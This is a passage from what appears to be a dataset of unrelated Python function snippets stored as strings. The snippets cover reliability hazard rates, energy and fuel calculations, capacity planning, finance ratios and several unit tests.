10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = 
_dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = 
(attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def calc_loss_heat_recovery (self):\n hr_used = self.cd['heat recovery operational']\n self.loss_heat_recovery = 0\n if hr_used:# == 'Yes':\n self.loss_heat_recovery = self.electric_diesel_reduction * \\\n (self.comp_specs['percent heat recovered'] / 100.0)\n #~ print 'self.loss_heat_recovery',self.loss_heat_recovery", "def emission_factor(sheets, vehicleClass, speedRegime, pollutant):\r\n # get bc from excel. 
The year is hard coded to 2015\r\n f = sheets[\"Emissiefactoren CAR-VL3.0\"]\r\n idx = f[f.iloc[:,0] == vehicleClass + speedRegime + '2015'].index\r\n if len(idx) == 0:\r\n print(\"EFError: No ef corresponds to vehicle class {} and speed type {}.\".format(vehicleClass, speedRegime))\r\n return 0\r\n return float(f['EF_' + pollutant][idx])", "def test_vm_cpu_limitation(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict,\n expected_values=expected_dict\n )", "def qty_available(quant) -> float:\n return quant.quantity - quant.reserved_quantity", "def calculate_supply(self):\r\n \r\n for cell in self.cells:\r\n cell.supply = min(self.max_volume,\r\n self.wave_speed / self.free_speed *\r\n (self.cell_length * self.jam_density -\r\n cell.volume)) /self.interval\r\n self.supply = self.cells[0].supply", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def get_risk_per_unit(price, sl_price):\n return abs(price - sl_price)", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def _calculate_fuel_r(self, mass):\n fuel = (mass // 3) - 2\n if fuel <= 0:\n return 0\n\n return (self._calculate_fuel_r(fuel) + fuel)", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def capacity_factor(self, update=False,\n min_cap_fact=None, max_cap_fact=None):\n if update or self._dfs['capacity_factor'] is None:\n self._dfs['capacity_factor'] = pudl.analysis.mcoe.capacity_factor(\n self, min_cap_fact=min_cap_fact, max_cap_fact=max_cap_fact)\n return self._dfs['capacity_factor']", "def calc_low_energy_bulb_ratio(lighting_outlets_total, lighting_outlets_low_energy):\n return int(100 * float(lighting_outlets_low_energy) / lighting_outlets_total + 0.5) / 100.0", "def get_total_fuel_requirements_part2(mass_lst: List[int]) -> int:\n total_fuel = 0\n for mass in mass_lst:\n while True:\n if get_fuel_requirements(mass) <= 0:\n break\n else:\n mass = get_fuel_requirements(mass)\n total_fuel += mass\n return total_fuel", "def get_expected_cost(self):", "def test_efficiency(self):\n effs = self.gr.calculate_global_efficiencies()\n ans = [a/6 for a in [1.5, 2., 1.5]]\n self.assertListEqual(effs.values(), ans)\n\n E = self.gr.global_efficiency()\n self.assertEqual(E, sum(ans))\n\n v_min = (E - (1/3)) / E\n mx, v = self.gr.vulnerability()\n # the middle node (2) is the most vulnerable\n self.assertEqual(mx, (2, v_min))", "def get_additional_ball_capacity(self):\n return 999", "def get_amount_in(amount_out, reserve_in, reserve_out):\n assert amount_out > 0\n assert reserve_in > 0 and reserve_out > 0\n numerator = reserve_in*amount_out*1000\n denominator = (reserve_out - amount_out)*997\n return float(numerator/denominator + 1)", "def dilutionneeded(self) -> float:\n return self.stock*1.0/self.final", "def test_capacity_factor(pudl_out_eia):\n print(\"\\nCalculating generator capacity factors...\")\n cf = pudl_out_eia.capacity_factor()\n print(f\" capacity_factor: {len(cf)} records\")", "def reusability(self):\n self._reusability = -0.25 * self.DCC + 0.25 * self.CAMC + 0.5 * self.CIS + 0.5 * self.DSC\n return round(self._reusability, 5)", "def volneeded(self, totalvol: float) -> float:\n return totalvol*self.final*1.0/self.stock", "def calc_excess_energy 
(self):\n #~ print sorted(self.cd.keys())\n self.excess_energy = \\\n (self.generation_wind_proposed - self.transmission_losses) * \\\n (self.cd['percent excess energy'] / 100.0)\n #~ print 'self.excess_energy',self.excess_energy", "def load_factor_d_non_peak(self, data):\n lf_d = np.zeros((data['nr_of_fueltypes']))\n\n # Iterate fueltypes to calculate load factors for each fueltype\n for k, fueldata in enumerate(self.rs_fuels_tot_enduses_d):\n\n average_demand = sum(fueldata) / 365 # Averae_demand = yearly demand / nr of days\n max_demand_d = max(fueldata)\n\n if max_demand_d != 0:\n lf_d[k] = average_demand / max_demand_d # Calculate load factor\n\n lf_d = lf_d * 100 # Convert load factor to %\n\n return lf_d", "def get_additional_ball_capacity(cls):\n return 999", "def calc_GT_operation_partload(wdot_W, gt_size_W, eta0, m0_exhaust_from_GT_kgpers, fuel_type):\n assert wdot_W <= gt_size_W\n\n if fuel_type == 'NG':\n exitT = CC_EXIT_T_NG\n LHV = LHV_NG\n else:\n exitT = CC_EXIT_T_BG\n LHV = LHV_BG\n\n part_load_factor = (wdot_W + 1) / gt_size_W # avoid calculation errors # TODO: reference?\n if part_load_factor < GT_MIN_PART_LOAD:\n raise ValueError('The load (', wdot_W, ')is lower than minimum part load (', gt_size_W * GT_MIN_PART_LOAD, ').')\n\n eta = (0.4089 + 0.9624 * part_load_factor - 0.3726 * part_load_factor ** 2) * eta0 # (4.12) [C. Weber, 2008]_\n # mdot = (0.9934 + 0.0066 * part_load_factor) * mdot0\n T_exhaust_GT_K = (0.7379 + 0.2621 * part_load_factor) * exitT # (4.14) [C. Weber, 2008]_\n m_fuel_kgpers = wdot_W / (eta * LHV)\n\n if fuel_type == 'NG':\n m_exhaust_GT_kgpers = (103.7 * 44E-3 + 196.2 * 18E-3 + 761.4 * 28E-3 + 200.5 * 32E-3 * (CC_AIRRATIO - 1) +\n 200.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 1.8156 # TODO: reference?\n\n else:\n m_exhaust_GT_kgpers = (98.5 * 44E-3 + 116 * 18E-3 + 436.8 * 28E-3 + 115.5 * 32E-3 * (CC_AIRRATIO - 1) + \\\n 115.5 * 3.773 * 28E-3 * (CC_AIRRATIO - 1)) * m_fuel_kgpers / 2.754 # TODO: reference?\n\n return eta, m_exhaust_GT_kgpers, T_exhaust_GT_K, m_fuel_kgpers", "def initialize_supply(self):\n unit_count = 0\n for i in range(self.start_allocation[0 ] -1, self.start_allocation[1]):\n for j in range(len(self.capacity_list[i][1])):\n self.capacity_list[i][1][j] = 1\n unit_count += 1\n self.total_supply -= unit_count", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def calculate_demand(flow, requested_sf, available_sf, service_functions):\n\n if requested_sf in available_sf:\n vnf_need_placement = False\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n 
sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n return demanded_total_capacity, vnf_need_placement\n else:\n vnf_need_placement = True\n available_sf[requested_sf] = {'load': 0.0}\n demanded_total_capacity = 0.0\n for sf_i, sf_data in available_sf.items():\n if requested_sf == sf_i:\n # Include flows data rate in requested sf capacity calculation\n demanded_total_capacity += service_functions[sf_i]['resource_function'](\n sf_data['load'] + flow.dr)\n else:\n demanded_total_capacity += service_functions[sf_i]['resource_function'](sf_data['load'])\n del available_sf[requested_sf]\n return demanded_total_capacity, vnf_need_placement", "def get_strength(self):\n return 10 - self.get_agility()", "def ram_condition(min_gb=3):\n return get_free_gb() < min_gb", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def test_cpu_limitation_without_guest_agent(self):\n expected_dict = self.calculate_expected_values(\n load_dict=self.load_dict\n )\n assert sla_helpers.load_vm_and_check_the_load(\n load_dict=self.load_dict, expected_values=expected_dict\n )", "def calc_lost_heat_recovery (self):\n if not self.cd['heat recovery operational']:\n\n self.lost_heat_recovery = [0]\n else:\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.lost_heat_recovery = \\\n (self.generation / gen_eff )* .10", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def _calc_worker_assign_limits(self, initial_count, occupied=None):\n occupied = occupied or dict()\n actual_count = initial_count - sum(occupied.values())\n\n endpoint_res = sorted(self._worker_slots.items(), key=operator.itemgetter(1),\n reverse=True)\n\n endpoints = [t[0] for t in endpoint_res]\n endpoint_cores = np.array([t[1] for t in endpoint_res]).astype(np.float32)\n\n # remove assigned nodes from limitations\n counts = initial_count * endpoint_cores / endpoint_cores.sum()\n for idx, ep in enumerate(endpoints):\n counts[idx] = max(0, counts[idx] - occupied.get(ep, 0))\n\n # all assigned, nothing to do\n if counts.sum() == 0:\n return dict((ep, 0) for ep in endpoints)\n\n counts = (actual_count * counts / counts.sum()).astype(np.int32)\n\n # assign remaining nodes\n pos = 0\n rest = actual_count - counts.sum()\n while rest > 0:\n counts[pos] += 1\n rest -= 1\n pos = (pos + 1) % len(counts)\n return dict(zip(endpoints, counts))", "def calcRMSE(inflow, demand):\n ssd = 0\n for i in range(len(inflow)):\n ssd += pow((inflow[i]-demand[i]),2)\n rmse = np.sqrt(ssd/len(inflow))\n return rmse", "def ComputeEAvailable(self):\r\n pass", "def standard_init_price(self):\n # If a system can't use something, its price is zero.\n _good = self.tradeitem\n if self.planet.tech_level < _good.tu and _good.name not in 'fuel':\n base_price = 0\n else:\n base_price = _good.plt + (self.planet.tech_level * _good.pi)\n # if good is highly requested, increase the price\n if self.planet.status in [_good.dps]:\n base_price = base_price + (base_price * 0.5)\n # large system: high production decreases prices\n base_price = 
(base_price * (100 - self.planet.system_size)) / 100\n\n # price can't be negative\n if base_price < 0:\n base_price = 0\n\n return int(base_price)", "def total_demand(self) -> float:\n return self.inputs.num_customers * self.operations.m3_per_customer()", "def revenue_landfill(self) -> float:\n return self.income_statement.revenue.operating_revenue * (\n 1 - self.inputs.allocation_to_collection_unit\n )", "def normalisedCPUCapacity(self):\n normCPUCapacities = map(lambda measurement: measurement.normaliseCpuCapacity(), self.measruements)\n return float(sum(normCPUCapacities)) / float(len(normCPUCapacities)) if normCPUCapacities else -1", "def cargo_used(self) -> Union[float, int]:\n return self.proto.cargo_space_taken", "def CalculateProcessingCapacity(self, problemManager, mineDataManager):\n \n self.oreProcessed = np.zeros(len(mineDataManager.theMiningSystem.oreMined)) \n self.processingPower = np.zeros(len(mineDataManager.theMiningSystem.oreMined)) \n self.processingCapacity = mineDataManager.theMiningSystem.mineOreProductionCapacity # ore is processed at a constant rate\n carryOver = 0.0\n for year in range( len(mineDataManager.theMiningSystem.oreMined )-1 ):\n processedOre = carryOver + mineDataManager.theMiningSystem.oreMined[year]\n \n if(processedOre > self.processingCapacity):\n carryOver = processedOre - self.processingCapacity\n processedOre = self.processingCapacity\n else:\n carryOver = 0.0\n self.oreProcessed[year] = processedOre\n \n self.oreProcessed[-1] = carryOver + mineDataManager.theMiningSystem.oreMined[-1] # final year\n \n \n # convert tonnes processed each year to the number of Mwh based on powerlaw fit\n self.processingPower = 3.96*(self.oreProcessed )**0.703 # in Mwh\n \n referenceMetalStr = mineDataManager.theOreBody.type[:2] \n # first two letters of orebody type is assumed to be reference metal for determining processing grade\n # eg AuCu -> gold is reference metal - note that user must select correct method\n \n \n referenceMetalOreConcentration = mineDataManager.theOreBody.metalGrades[referenceMetalStr]\n\n self.concentrateMetalConcentration = 1.0\n \n # lookup concentrateMetalConcentrations based on reference metal type\n \n concentrateConcentrations = {\"Au\":0.75,\"Ag\":0.85,\"Ni\":0.1,\"Cu\":0.25,\"Pb\":0.5}\n \n # find the minimum amount of concentration needed to bring concentrate to market\n minConcentrationFactor = 1e64\n \n for metal,metalOreGrade in mineDataManager.theOreBody.metalGrades.iteritems():\n if metal in concentrateConcentrations:\n concentrateGrade = concentrateConcentrations[metal]\n concFactor = concentrateGrade/(metalOreGrade/(1.0+ mineDataManager.theMiningSystem.dilution) +1e-64)\n if concFactor < 1.0:\n concFactor = 1.0\n #print \"concFactor\", metal, concFactor, metalOreGrade, concentrateGrade\n if(concFactor < minConcentrationFactor ):\n minConcentrationFactor = concFactor\n self.concentrateMetalConcentration = concentrateGrade\n \n # concentrate is calculated based on estimate of mineral content\n self.concentrateProduced = (1.0 - self.processingLoss) \\\n *np.array(mineDataManager.theMiningSystem.oreMined)/minConcentrationFactor \n \n \n return self.processingCapacity", "def test_carriers_reserve_margin_constraint(self):\n m = build_model(\n {\"model.reserve_margin.electricity\": 0.01},\n \"simple_supply,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n assert hasattr(m._backend_model, \"reserve_margin_constraint\")", "def kilometres_available(self):\n return self.fuel / self.litres_per_kilometre", "def 
get_excess(self) -> int:\n excess_to_min_treasury = self._treasury_balance.get() - self._treasury_min.get()\n auth_score = self.create_interface_score(self._game_auth_score.get(), AuthInterface)\n if not self._excess_smoothing_live.get():\n return excess_to_min_treasury - auth_score.get_excess()\n else:\n third_party_games_excess: int = 0\n games_excess = auth_score.get_todays_games_excess()\n for game in games_excess:\n third_party_games_excess += max(0, int(games_excess[game]))\n reward_pool = excess_to_min_treasury - third_party_games_excess * 20 // 100\n return reward_pool", "def calc_generation_wind_proposed (self):\n if self.comp_specs['proposed capacity'] != UNKNOWN:\n self.load_offset_proposed = \\\n self.comp_specs['proposed capacity']\n self.generation_wind_proposed = \\\n self.comp_specs['proposed generation']\n\n if self.generation_wind_proposed == UNKNOWN:\n self.generation_wind_proposed = self.load_offset_proposed *\\\n float(self.comp_specs\\\n ['capacity factor'])*\\\n constants.hours_per_year\n\n return\n\n self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def new_capacity_rule(mod, prj, prd):\n return 0", "def CalcEffectiveInventory(self):\r\n return (self.currentStock - self.currentOrders)", "def penaltyFactor(m):\n \"\"\" m in GeV \"\"\"\n if m*m>0.71:\n return math.pow(m*m/0.71,-4)\n else:\n return 1", "def recommend_contract(meter_load, percentile=100.0):\n\n load_value = np.nanpercentile(meter_load[meter_load != 0], percentile)\n\n for contract in contracts_available:\n if load_value < contract:\n return contract/kW\n\n return contracts_available[-1]/kW", "def calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more 
resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def getResidualCapacity(self, edge):\r\n return self.getCapacity(edge) - self.getFlow(edge)", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def _handle_icx_get_total_supply(self,\n context: 'IconScoreContext',\n params: dict) -> int:\n return self._icx_engine.get_total_supply(context)", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. 
If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def new_capacity_rule(mod, g, p):\n return 0", "def get_occupant_room_load_for_cooling_balanced(\n l_cs: np.ndarray, l_cl: np.ndarray, q_d_trs_prt: np.ndarray) -> (np.ndarray, np.ndarray):\n\n l_d_cs = np.where(l_cs[0:5] > 0.0, l_cs[0:5] - q_d_trs_prt, 0.0)\n l_d_cl = l_cl[0:5]\n\n return np.clip(l_d_cs, 0.0, None), np.clip(l_d_cl, 0.0, None)", "def calculate_lower_boundary(self, divisor):\n\n # see how low you can go\n quotas = [0] * self.states\n fair_shares = [0] * self.states\n counter = 0\n lowest_divisor = 0\n prev_divisor = 0\n estimator = 1000000000\n while counter < 1000:\n for i, population in enumerate(self.populations):\n if divisor is None or population is None:\n return None\n quotas[i] = population / divisor\n fair_shares[i] = math.floor(quotas[i])\n if sum(fair_shares) != self.num_seats:\n estimator = estimator / 10\n prev_divisor = divisor\n divisor = lowest_divisor - estimator\n else:\n lowest_divisor = divisor\n divisor = prev_divisor - estimator\n if lowest_divisor == divisor:\n break\n counter += 1\n return math.ceil(lowest_divisor * 1000) / 1000", "def _check_capacity_limit(self, res, amt, balance, meta, raven_vars, dispatch, t):\n cap = self.get_capacity(meta, raven_vars, dispatch, t)[0][self._capacity_var]\n try:\n if abs(balance[self._capacity_var]) > abs(cap):\n #ttttt\n # do the inverse problem: how much can we make?\n balance, meta = self.produce_max(meta, raven_vars, dispatch, t)\n print('The full requested amount ({res}: {req}) was not possible, so accessing maximum available instead ({res}: {blc}).'.format(res=res, req=amt, blc=balance[res]))\n except KeyError:\n raise SyntaxError('Resource \"{}\" is listed as capacity limiter, but not an output of the component! 
Got: {}'.format(self._capacity_var, balance))\n return balance, meta", "def calculateSaleReturnSolidity(S, R, F, T):\n _supply = uint256(S)\n _reserveBalance = uint256(R)\n _reserveRatio = uint256(F)\n _sellAmount = uint256(T)\n \n if ( _supply < _sellAmount):\n raise Exception(\"Supply < Tokens\")\n\n _baseN = _supply - _sellAmount\n\n\n if _reserveRatio == 100:\n amount = uint256(_reserveBalance * _baseN ) / _supply\n if _reserveBalance < amount:\n raise Exception(\"_reservebalance < amount\")\n\n return _reserveBalance - amount\n\n resD = FIXED_ONE\n #resN = power_sale(_supply, _baseN, 100, _reserveRatio)\n resN = power(_supply, _baseN, 100, _reserveRatio)\n resN = uint256(resN)\n\n reserveUpshifted = uint256(_reserveBalance * resN)\n amount = uint256(_reserveBalance * resD) \n\n \n result = (reserveUpshifted - amount) / resN\n \n if verbose:\n print(\" rbal[%d] * resN[%d] / resD[%d] - rbal[%d] = %d \" %\n (_reserveBalance, resN, resD, _reserveBalance, result))\n\n return uint256(result - minUnit(R))", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def trucks_required(self) -> int:\n daily_demand = (\n self.total_demand() / self.operations.productivity.working_days_per_year\n )\n trucks_required = np.ceil(\n daily_demand\n / (self.operations.avg_vol_per_lift() * self.inputs.lifts_per_truck_day)\n )\n return trucks_required", "def get_utilization(self, node: int) -> float:\n return self.busy[node].pmf(1)", "def calc(self, demands: Demand, routing: Routing) -> np.ndarray:\n total_utilisation = np.zeros((self.num_nodes, self.num_nodes),\n dtype=float)\n\n for commodity_idx in range(len(self.commodities)):\n utilisation = self.calc_demand(routing,\n demands[commodity_idx],\n commodity_idx)\n total_utilisation += utilisation\n\n return np.max(np.divide(total_utilisation, self.edge_capacities))", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def _cost(self, action):\n return float(self.spacecraft.crashed)", "def calc_DC_supply(t_0, t_1):\n if t_0 == 0:\n t_0 = 1E6\n if t_1 > 0:\n tmin = min(t_0, t_1)\n else:\n 